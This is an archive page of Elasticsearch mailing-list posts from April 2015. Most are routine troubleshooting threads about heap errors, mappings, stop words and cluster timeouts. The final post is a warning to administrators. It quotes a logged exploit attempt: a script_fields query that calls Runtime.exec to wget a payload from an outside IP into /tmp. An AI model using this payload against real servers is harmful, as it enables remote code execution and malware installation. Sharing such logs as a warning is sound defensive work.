https://groups.google.com/d/msgid/elasticsearch/CAEYi1X_KJHAHgmp%3DdDbsrMGhEXZ4coQifJdZ1_o353ctHQs3DA%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread joergpra...@gmail.com
I have thousands of concurrent indexing/queries running per second on
non-virtualized servers.

4G heap is ok, it is more than enough, there should be other reasons for
OOM I am sure.

Maybe Bigdesk can help for monitoring heap and cache eviction rates.

I think I can not help any more - no experience with EC2.

Jörg

On Thu, Apr 16, 2015 at 8:05 PM, Manjula Piyumal 
wrote:

> Hi Jörg,
>
> Sorry, my bad. It's a typo, I have used 4GB heap for all three ES servers.
> I have tried without limiting the cache size as the first attempt. But it
> also got the out of memory error. Am I not missing any other configuration?
> Or is this load is too much for 4GB heap?
>
> Thanks
> Manjula
>
> --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/c41b0dd9-31b8-45ee-909e-0f5e2995c4ac%40googlegroups.com
> 
> .
>
> For more options, visit https://groups.google.com/d/optout.
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAKdsXoEF0pFDGWHiUjBYShTSMBmk%3D-zMW8mkZQMqNpMO74sNPA%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: Storing/searching IPs

2015-04-16 Thread joergpra...@gmail.com
It is possible to write a plugin with IP/subnet as a new field type.

Jörg

On Thu, Apr 16, 2015 at 9:34 PM, Attila Nagy  wrote:

> Hi,
>
> I would like to store IP addresses and subnets (one or more per document)
> and I would like to search for them with exact or inclusion (does an IP is
> in any of the subnets stored in the documents).
>
> For example a document could have the following:
> "ip": ["192.168.0.1","192.168.1.0/24","1000::/64"]
>
> And searching for 192.168.0.1, 192.168.1.5 or 1000::1 should match it.
>
> Are there any chances to have this sometime soon? And if not, what would
> be the best hack (if any) to support this?
>
> Thanks,
>
> --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/3bfede54-5fde-4b65-9947-bfc43e3bdef8%40googlegroups.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAKdsXoH7CSTfX%2B37N6x8RCGOynjxD_Ktqp0zrG6Oa0oZtjA%3DBQ%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: Scoring based on the number of matches in the field

2015-04-16 Thread Andre Dantas Rocha
Hi Doug,

Your suggestion worked perfectly!

Thank very much.

Andre

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/8c1b36c1-d0fb-45e7-8e3b-2b4934e02c7f%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Storing/searching IPs

2015-04-16 Thread Attila Nagy
Hi,

I would like to store IP addresses and subnets (one or more per document) 
and I would like to search for them with exact or inclusion (does an IP is 
in any of the subnets stored in the documents).

For example a document could have the following:
"ip": ["192.168.0.1","192.168.1.0/24","1000::/64"]

And searching for 192.168.0.1, 192.168.1.5 or 1000::1 should match it.

Are there any chances to have this sometime soon? And if not, what would be 
the best hack (if any) to support this?

Thanks,

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/3bfede54-5fde-4b65-9947-bfc43e3bdef8%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: how to change the store value of a field

2015-04-16 Thread Antoine Brun
merci!

On Thu, Apr 16, 2015 at 7:11 PM, David Pilato  wrote:

> No you need to reindex
>
> --
> David ;-)
> Twitter : @dadoonet / @elasticsearchfr / @scrutmydocs
>
> Le 16 avr. 2015 à 17:52, Antoine Brun  a écrit :
>
> Hello,
>
> is there any simple way to update a mapping and change the store value of
> a field?
> I'm trying to enable _timestamp:
> curl -X PUT http://localhost:9200/ubilogs-mbr/_mappings/logs -d '{
> "logs" : {
> "_timestamp" : {
> "enabled" : true,
> "store" : true,
> "format": "-MM-dd HH:mm:ss.SSS"
> }
> }
> }'
>
> but I get
>
> {"error":"MergeMappingException[Merge failed with failures {[mapper
> [_timestamp] has different store values]}]","status":400}
>
>
> Antoine
>
>
>  --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/d19ba2b2-0371-4495-8886-b0250f48463f%40googlegroups.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>
>  --
> You received this message because you are subscribed to a topic in the
> Google Groups "elasticsearch" group.
> To unsubscribe from this topic, visit
> https://groups.google.com/d/topic/elasticsearch/Wchqq-E1o4Y/unsubscribe.
> To unsubscribe from this group and all its topics, send an email to
> elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/E404E4DF-DCF4-409C-97B0-425FFB2501C6%40pilato.fr
> 
> .
>
> For more options, visit https://groups.google.com/d/optout.
>



-- 
Antoine

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAGUV-q_LBQO87%2B%3DgJj7hU1J1rcUWcazGpea4c8RaAoG%2BdQJf1g%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread Manjula Piyumal
Hi Jörg,

Sorry, my bad. It's a typo, I have used 4GB heap for all three ES servers. 
I have tried without limiting the cache size as the first attempt. But it 
also got the out of memory error. Am I not missing any other configuration? 
Or is this load is too much for 4GB heap?

Thanks
Manjula

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/c41b0dd9-31b8-45ee-909e-0f5e2995c4ac%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: how to change the store value of a field

2015-04-16 Thread David Pilato
No you need to reindex 

--
David ;-)
Twitter : @dadoonet / @elasticsearchfr / @scrutmydocs

> Le 16 avr. 2015 à 17:52, Antoine Brun  a écrit :
> 
> Hello,
> 
> is there any simple way to update a mapping and change the store value of a 
> field?
> I'm trying to enable _timestamp:
> curl -X PUT http://localhost:9200/ubilogs-mbr/_mappings/logs -d '{
> "logs" : {
> "_timestamp" : { 
> "enabled" : true,
> "store" : true,
> "format": "-MM-dd HH:mm:ss.SSS"
> }
> }
> }'
> 
> but I get
> 
> {"error":"MergeMappingException[Merge failed with failures {[mapper 
> [_timestamp] has different store values]}]","status":400}
> 
> 
> Antoine
> 
> 
> -- 
> You received this message because you are subscribed to the Google Groups 
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit 
> https://groups.google.com/d/msgid/elasticsearch/d19ba2b2-0371-4495-8886-b0250f48463f%40googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/E404E4DF-DCF4-409C-97B0-425FFB2501C6%40pilato.fr.
For more options, visit https://groups.google.com/d/optout.


Re: timestamp

2015-04-16 Thread David Pilato
You need to reindex in a new index.

--
David ;-)
Twitter : @dadoonet / @elasticsearchfr / @scrutmydocs

> Le 16 avr. 2015 à 17:33, Antoine Brun  a écrit :
> 
> Hello,
> 
> based on the comments I could create a new index with _timestamp activated 
> and it works great.
> Now my probleme arrives when I want to activate the timestamp on an existing 
> index.
> Since _timestamp is not stored by default, I wanted to set "store" to true, 
> but I get 
> 
> {
> "error": "MergeMappingException[Merge failed with failures {[mapper 
> [_timestamp] has different store values]}]",
> "status": 400
> }
> 
> Is there any way to achieve this?
> 
> Antoine
> 
> 
> Le mardi 7 avril 2015 18:20:33 UTC+2, Antoine Brun a écrit :
>> 
>> Hello,
>> 
>> I'm trying to use the timestamp feature to automatically add a timestamp to 
>> the newly indexed doc.
>> Since we are already indexing document without timestamp I figured out that 
>> I could simply execute:
>> 
>> curl -XPUT 'http://localhost:9200/ubilogs-mbr/_mapping/logs' -d '{
>> "logs" : {
>> "_timestamp" : { 
>>  "enabled" : true,
>>   "stored" : true,
>>   "format": "-MM-dd HH:mm:ss.SSS"
>> }
>> }
>> }'
>> 
>> and the next document to be indexed will have the _timestamp field added.
>> But when I search for the doc with, for example:
>> {"fields":["_timestamp"],"query":{"match_all":{}}}
>> 
>> I only get 
>> 
>> {
>> "_index": "ubilogs-mbr",
>> "_type": "logs",
>> "_id": "AUyVGpmfoHcL_d0dTPU4",
>> "_score": 1
>> }
>> 
>> no _timestamp field here.
>> Is there anything else to do?
>> 
>> Is my understanding correct: ES cluster will automatically generate a 
>> default _timestamp with the time when the doc is indexed?
>> 
>> Antoine
> 
> -- 
> You received this message because you are subscribed to the Google Groups 
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit 
> https://groups.google.com/d/msgid/elasticsearch/c2cad5d1-038c-4a76-a9e8-1dca1ea81d59%40googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/E558667C-C0B1-4AAD-85D0-956D51F9D2B8%40pilato.fr.
For more options, visit https://groups.google.com/d/optout.


Re: ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread joergpra...@gmail.com
Did you assign different heap sizes? Please use same heap size for all data
nodes. Do not limit cache to 30%, this is very small. Let ES use the
default settings.

Jörg

On Thu, Apr 16, 2015 at 5:43 PM, Manjula Piyumal 
wrote:

> Hi all,
>
> I am trying to run load test with ES to identify system requirements and
> optimum configurations with respect to my load. I have 10 data publishing
> tasks and 100 data consuming tasks in my load test.
> Data publisher : Each publisher publishes data in every minute and it
> publishes 1700 records as a batch using java bulk API.
> Data consumer : Each consumer runs in every minute and run a query with
> randomly selected aggregation type(average, minimum or maximum) for a
> selected data for last hour.
> example query that consumer run in every minute :
>
> SearchResponse searchResponse =
> client.prepareSearch("myIndex").setTypes("myRecordType")
> .setQuery(QueryBuilders.filteredQuery(QueryBuilders.matchQuery("filed1",
> "value1"),FilterBuilders.rangeFilter("field2").from("value2").to("value3")))
>
> .addAggregation(AggregationBuilders.avg("AVG_NAME").field("field3")).execute().actionGet();
>
> I have run above test case in my local machine without ES clustering and
> it was run around 4 hours without any errors. Memory consumption of ES was
> under 2GB. After that I have run same test case in three node ES
> cluster(EC2 instances) and ES has ended up with out of memory error after
> around 5 minutes in that case. My all three instances have following same
> hardware configurations,
>
> 8GB RAM
> 80GB SSD hard disk
> 4 core CPU
>
> Instance 1
> Elasticsearch server (4GB heap)
> 10 data publishers which will publish data to the local ES server
>
> Instance 2
> Elasticsearch server (8GB heap)
> 10 consumers which will query data from the local ES server
>
> Instance 3
> Elasticsearch server (4GB heap)
>
> I'm using ES 1.5.1 version with jdk 1.8.0_40.
>
> My ES cluster have following custom configurations (all other
> configurations are default configurations)
>
> bootstrap.mlockall: true
> indices.fielddata.cache.size: "30%"
> indices.cache.filter.size: "30%
> discovery.zen.ping.multicast.enabled: false
> discovery.zen.ping.unicast.hosts: ["host1:9300","host2:9300","host3:9300"]
>
> I believe I have missed something here regarding ES clustering
> configuration. Please help me to identify what I have missed here. I want
> to reduce the memory utilization as much as possible, that's why I have
> given only 4GB heap to ES. If there is a way to reduce the memory
> consumption by reducing read consistency level that option is also OK for
> me. I have increased the refresh interval for my index, but still no luck :(
>
> Thanks
> Manjula
>
>  --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/9f8ebc90-dd37-4da7-97bd-3c0d1c00165c%40googlegroups.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAKdsXoGuT%3DEo74poKcyVhfgiW5W82AFmMSX9ouUEJDAPqhajpQ%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


how to change the store value of a field

2015-04-16 Thread Antoine Brun
Hello,

is there any simple way to update a mapping and change the store value of a 
field?
I'm trying to enable _timestamp:
curl -X PUT http://localhost:9200/ubilogs-mbr/_mappings/logs -d '{
"logs" : {
"_timestamp" : { 
"enabled" : true,
"store" : true,
"format": "-MM-dd HH:mm:ss.SSS"
}
}
}'

but I get

{"error":"MergeMappingException[Merge failed with failures {[mapper 
[_timestamp] has different store values]}]","status":400}


Antoine


-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/d19ba2b2-0371-4495-8886-b0250f48463f%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Stop words still getting indexed after setting stop words at index level

2015-04-16 Thread bvnrwork
Hi ,

Am using stop words first time .

I am trying to configure stop words and want to see indexing process omits 
these stop words 

can you let me know why stop words not getting omitted during indexing .

I still see  "AND",
  "AN",
  "THE",
  "The" are still got indexed 


The below  is index creation request 



{
  "settings": {
"index": {
  "number_of_shards": 1,
  "number_of_replicas": 0,
  "analysis": {
"analyzer": {
  "standard": {
"type": "standard"
  },
  "english": {
"stopwords": [
  "AND",
  "AN",
  "THE",
  "The",
  ""
],
"type": "english"
  },
  "cjk": {
"type": "cjk"
  },
  "french": {
"type": "french"
  },
  "german": {
"type": "german"
  },
  "italian": {
"type": "italian"
  },
  "spanish": {
"type": "spanish"
  },
  "russian": {
"type": "russian"
  },
  "arabic": {
"type": "arabic"
  }
}
  }
}
  },
  "aliases": {
"1005": {}
  }
}

and below is the index  field mapping request 



{
  "document": {
"date_detection": true,
"numeric_detection": true,
"dynamic_templates": [
  {
"multi": {
  "match": "multi_*",
  "mapping": {
"type": "multi_field",
"fields": {
  "{name}": {
"index": "analyzed",
"type": "{dynamic_type}"
  },
  "{name}_raw": {
"index": "not_analyzed",
"type": "{dynamic_type}"
  }
}
  }
}
  },
  {
"number": {
  "match": "n0*",
  "mapping": {
"index": "analyzed",
"type": "{dynamic_type}"
  }
}
  }
]
  }
}

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/7589412d-ca04-4c54-88b3-ffcdad48b337%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread Manjula Piyumal
Hi all,

I am trying to run load test with ES to identify system requirements and 
optimum configurations with respect to my load. I have 10 data publishing 
tasks and 100 data consuming tasks in my load test. 
Data publisher : Each publisher publishes data in every minute and it 
publishes 1700 records as a batch using java bulk API.
Data consumer : Each consumer runs in every minute and run a query with 
randomly selected aggregation type(average, minimum or maximum) for a 
selected data for last hour.
example query that consumer run in every minute : 

SearchResponse searchResponse = 
client.prepareSearch("myIndex").setTypes("myRecordType")
.setQuery(QueryBuilders.filteredQuery(QueryBuilders.matchQuery("filed1", 
"value1"),FilterBuilders.rangeFilter("field2").from("value2").to("value3")))
.addAggregation(AggregationBuilders.avg("AVG_NAME").field("field3")).execute().actionGet();

I have run above test case in my local machine without ES clustering and it 
was run around 4 hours without any errors. Memory consumption of ES was 
under 2GB. After that I have run same test case in three node ES 
cluster(EC2 instances) and ES has ended up with out of memory error after 
around 5 minutes in that case. My all three instances have following same 
hardware configurations,

8GB RAM
80GB SSD hard disk
4 core CPU

Instance 1
Elasticsearch server (4GB heap)
10 data publishers which will publish data to the local ES server

Instance 2
Elasticsearch server (8GB heap)
10 consumers which will query data from the local ES server

Instance 3
Elasticsearch server (4GB heap)

I'm using ES 1.5.1 version with jdk 1.8.0_40.

My ES cluster have following custom configurations (all other 
configurations are default configurations)

bootstrap.mlockall: true
indices.fielddata.cache.size: "30%"
indices.cache.filter.size: "30%
discovery.zen.ping.multicast.enabled: false
discovery.zen.ping.unicast.hosts: ["host1:9300","host2:9300","host3:9300"]

I believe I have missed something here regarding ES clustering 
configuration. Please help me to identify what I have missed here. I want 
to reduce the memory utilization as much as possible, that's why I have 
given only 4GB heap to ES. If there is a way to reduce the memory 
consumption by reducing read consistency level that option is also OK for 
me. I have increased the refresh interval for my index, but still no luck :(

Thanks
Manjula

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/9f8ebc90-dd37-4da7-97bd-3c0d1c00165c%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: How many fields is too many?

2015-04-16 Thread Nikolas Everett
On Thu, Apr 16, 2015 at 10:54 AM, Mitch Kuchenberg 
wrote:

> Hey Nik, you'll have to forgive me if any of my answers don't make sense.
> I've only been familiar with Elasticsearch for about a week.
>
> 1.  Here's a template for my documents:
> https://gist.github.com/mkuchen/d71de53a80e078242af9
>
This is pretty useless to me. You'd need to show me a fully expanded
version in JSON.


> 2.  I interact with my search engine through django-haystack
> .  A query may look
> like
> `SearchQuerySet().filter(document='mitch').order_by('created_at')[:100] --
> so essentially getting the first 100 documents that have `mitch` in them,
> ordered by the field `created_at`.
>
Its always best when talking about things like this to do it with curl
posting JSON because curl is our common language.

>
> 3.  Each node has 247.5MB of heap allocated judging by my hosting
> service's dashboard.
>
Sorry, what is the value of -Xmx parameter you used to run Elasticsearch.
The actual amount of of heap in use at a time isn't usually useful.


> 4.  The documents/fields take up roughly 30MB on disk.
>
These should be instant.


> 5.  Using Elasticsearch version 1.4.2 but could very easily upgrade.
>
Its cool.


> 6.  I'm hosting with found.no so I don't have access to a command line to
> run that unfortunately.
> 7.  I haven't found any options in found.no to disable swapping, so I
> would assume they have it off by default?  I could be wrong though.
>

I think you should take this up with found.no. Maybe try running
elasticsearch locally and comparing. In general 30mb of index should be
instantly searchable unless Elasticsearch is swapped out or the linux disk
cache is cold and the io subsystem is amazingly garbage. Or something else
weird like that.

The last question that I forgot to ask was what your mapping is.

Nik

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAPmjWd2QMOEjh926mEzvngDPHD-O%2BV9rWLKb9vXj%3DDHAmwLs7g%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: timestamp

2015-04-16 Thread Antoine Brun
Hello,

based on the comments I could create a new index with _timestamp activated 
and it works great.
Now my probleme arrives when I want to activate the timestamp on an 
existing index.
Since _timestamp is not stored by default, I wanted to set "store" to true, 
but I get 

{
"error": "MergeMappingException[Merge failed with failures {[mapper 
[_timestamp] has different store values]}]",
"status": 400
}

Is there any way to achieve this?

Antoine


Le mardi 7 avril 2015 18:20:33 UTC+2, Antoine Brun a écrit :
>
> Hello,
>
> I'm trying to use the timestamp feature to automatically add a timestamp 
> to the newly indexed doc.
> Since we are already indexing document without timestamp I figured out 
> that I could simply execute:
>
> curl -XPUT 'http://localhost:9200/ubilogs-mbr/_mapping/logs' -d '{
> "logs" : {
> "_timestamp" : { 
>  "enabled" : true,
>   "stored" : true,
>   "format": "-MM-dd HH:mm:ss.SSS"
> }
> }
> }'
>
> and the next document to be indexed will have the _timestamp field added.
> But when I search for the doc with, for example:
> {"fields":["_timestamp"],"query":{"match_all":{}}}
>
> I only get 
>
> { 
>
>- "_index": "ubilogs-mbr",
>- "_type": "logs",
>- "_id": "AUyVGpmfoHcL_d0dTPU4",
>- "_score": 1
>
> }
>
> no _timestamp field here.
> Is there anything else to do?
>
> Is my understanding correct: ES cluster will automatically generate a 
> default _timestamp with the time when the doc is indexed?
>
> Antoine
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/c2cad5d1-038c-4a76-a9e8-1dca1ea81d59%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


1.5.1 upgrade failure

2015-04-16 Thread Ted Smith
Hi, 

I just upgraded from 1.5.0 to 1.5.1
I got bunches of errors with following I think show the issue

[nested: ElasticsearchException[failed to read [dd][1428754566313]]; 
nested: ElasticsearchIllegalArgumentException[No version type match [99]]; 
]]


Any idea how to fix it?  somehow I can still query it.

Thanks

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/7105f223-1e1c-4ccb-abee-efe456cdc176%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


[ANN] Elasticsearch Azure cloud plugin 2.6.0 released

2015-04-16 Thread Elasticsearch Team
Heya,


We are pleased to announce the release of the Elasticsearch Azure cloud plugin, 
version 2.6.0.

The Azure Cloud plugin allows to use Azure API for the unicast discovery 
mechanism and add Azure storage repositories..

https://github.com/elastic/elasticsearch-cloud-azure/

Release Notes - elasticsearch-cloud-azure - Version 2.6.0


Fix:
 * [56] - [package] stax-api is added twice 
(https://github.com/elastic/elasticsearch-cloud-azure/issues/56)
 * [55] - Failure when creating a container should raise an exception 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/55)

Update:
 * [77] - Update to elasticsearch 1.5.0 
(https://github.com/elastic/elasticsearch-cloud-azure/issues/77)
 * [65] - Simplify  setting index.store.type with smb_simple_fs and smb_mmap_fs 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/65)
 * [63] - Use Azure Java Management SDK 0.7.0 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/63)
 * [62] - Rename settings for discovery and repositories 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/62)
 * [61] - Rename settings for repositories 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/61)
 * [57] - Use Azure Storage 2.0.0 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/57)

New:
 * [64] - Add keystore.type, deployment.name and deployment.slot settings for 
discovery (https://github.com/elastic/elasticsearch-cloud-azure/pull/64)
 * [60] - Open Lucene MMap/SimpleFSDirectory with Read option 
(https://github.com/elastic/elasticsearch-cloud-azure/pull/60)



For questions or comments around this plugin, feel free to use elasticsearch 
mailing list: https://groups.google.com/forum/#!forum/elasticsearch

Enjoy,

-The Elasticsearch team

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/552fd4f7.e307b40a.2860.9e90SMTPIN_ADDED_MISSING%40gmr-mx.google.com.
For more options, visit https://groups.google.com/d/optout.


Index boost

2015-04-16 Thread David Sinclair
Hi,

We have an index per category of item we are indexing.  Our search then 
searches across all of the indexes.  I would like to boost results from 
some indexes.   Reading the docs this seems to be what I want: 

http://www.elastic.co/guide/en/elasticsearch/reference/1.x/search-request-index-boost.html

However I cannot see how to do this with the java api.  Is it possible to 
add index boost when using the QueryBuilder?  

Thanks in advance,

David

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/a5644855-1175-4853-8952-544e6bb56693%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Saturating the management thread pool

2015-04-16 Thread Charlie Moad
A few days ago we started to receive a lot of timeouts across our cluster. 
This is causing shard allocation to fail and a perpetual red/yellow state.

Examples:
[2015-04-16 15:04:50,970][DEBUG][action.admin.cluster.node.stats] 
[coordinator02] failed to execute on node [1rfWT-mXTZmF_NzR_h1IZw]
org.elasticsearch.transport.ReceiveTimeoutTransportException: 
[search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][cluster:monitor/nodes/stats[n]]
 
request_id [3680727] timed out after [15001ms]
at 
org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
at 
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at 
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)

[2015-04-16 15:03:26,105][WARN ][gateway.local] [coordinator02] 
[global.y2014m01d30.v2][0]: failed to list shard stores on node 
[1rfWT-mXTZmF_NzR_h1IZw]
org.elasticsearch.action.FailedNodeException: Failed node 
[1rfWT-mXTZmF_NzR_h1IZw]
at 
org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.onFailure(TransportNodesOperationAction.java:206)
at 
org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.access$1000(TransportNodesOperationAction.java:97)

at 
org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction$4.handleException(TransportNodesOperationAction.java:178)
at 
org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
at 
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at 
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.transport.ReceiveTimeoutTransportException: 
[search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][internal:cluster/nodes/indices/shard/store[n]]
 
request_id [3677537] timed out after [30001ms]
... 4 more

I believe I have tracked this down to the management thread pool being 
saturated on our data nodes and not responding to requests. Our cluster has 
3 master nodes,no data and 3 worker nodes,no master. I increased the 
maximum pool size from 5 to 20 and the workers immediately jumped to 20. 
I'm still seeing the errors.

hostmanagement.type management.active 
management.size management.queue management.queueSize management.rejected 
management.largest management.completed management.min management.max 
management.keepAlive 
coordinator01   scaling 1   
200 
 237884  1 20   5m 
search02scaling 1 
 2000   
  20  1945337  1 20   
5m 
search01scaling 1 
 2000   
  20  2034838  1 20   
5m 
search03scaling 1 
 2000   
  20  1862848  1 20   
5m 
coordinator03   scaling 1   
200 
 237875  1 20   5m 
coordinator02   scaling 2   
500 
 544127  1 20   5m 

How can I address this problem?

Thanks,
 Charlie

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/58d67b54-212c-4b72-944b-3ae3f75fe4da%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Warning: Exploiting attempts for ES..

2015-04-16 Thread Eike Dehling
In case your elasticsearch cluster is internet-accessible: Be aware folks
on the internet are probably trying to exploit it...

Found this in our logging today (This is only our staging environment
fortunately):


Caused by: org.elasticsearch.search.SearchParseException:
[logstash-2015.04.15][0]: query[ConstantScore(*:*)],from[-1],size[-1]:
Parse Failure [Failed to parse source [{"query": {"filtered": {"query":
{"match_all": {, "script_fields": {"exp": {"script": "import
java.util.*;import java.io.*;String str = \"\";BufferedReader br = new
BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O
/tmp/ruvn http://122.224.48.28:8000/ruvn\";).getInputStream()));StringBuilder
sb = new
StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},
"size": 1}]]

-- 
Met vriendelijke groet,
Kind regards,

Eike Dehling
Lead Developer

Buzzcapture
Herengracht 180, 1016 BR, Amsterdam

T: +31 (0)20 3200377
M: +31 (0)6 45144840

LinkedIn | @buzzcapture

Recent

11-03-2015: Donderdag 26 maart organiseert Buzzcapture #Buzz15
